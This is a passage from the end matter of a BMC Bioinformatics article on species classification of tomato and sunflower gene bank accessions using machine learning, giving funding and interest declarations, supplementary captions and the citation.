project (WOT-03 Genetic Resources), both funded by the Dutch Ministry of Agriculture, Nature and Food Quality. The funding bodies played no role in the design of the study and collection, analysis, and interpretation of data and in writing the manuscript. Ethics approval and consent to participate Consent for publication The authors declare that they have no competing interests. Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. Prediction accuracy per species and species representation. Classifiers are Random Forest (RF), Naive Bayes (NB), Neighbour-Joining (NJ), 1-Nearest Neighbour (1-NN), and 3-Nearest-Neighbours (3-NN), respectively. The number of accessions per species is denoted by ’n’. The best performance for each dataset is presented in bold. Neighbour-Joining tree of Helianthus species represented by 10 or more accessions. The number of divergent sites was used as a measure of distance. Potentially misclassified accessions (niv07, pet02, max148, and pet88 ) are marked by a black asterisk. RandomForest outlier scores for all sunflower accessions. The dashed line represents the cut-off score used, which is 10. Tomato reseq dataset and predictions. List of resequenced tomato accessions included in this study, their a priori classifications and species predictions from all classifiers studied. Sunflower dataset and predictions. List of sunflower accessions included in this study, their a priori classifications and species predictions from all classifiers studied. Tomato AFLP dataset and predictions. List of tomato AFLP accessions included in this study, their a priori classifications and species predictions from all classifiers studied. About this article Cite this article van Bemmelen van der Plaat, A., van Treuren, R. & van Hintum, T.J.L. Reliable genomic strategies for species classification of plant genetic resources. BMC Bioinformatics 22, 173 (2021). https://doi.org/10.1186/s12859-021-04018-6 - Plant genetic resources - Species classification - Machine learning - Crop wild relatives - Gene bank documentation
<urn:uuid:a90dca0f-1f4a-4a99-bb39-b79774824822>
CC-MAIN-2022-33
https://bmcbioinformatics.biomedcentral.com/articles/10.1186/s12859-021-04018-6
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571538.36/warc/CC-MAIN-20220812014923-20220812044923-00465.warc.gz
en
0.900997
12,988
2.65625
3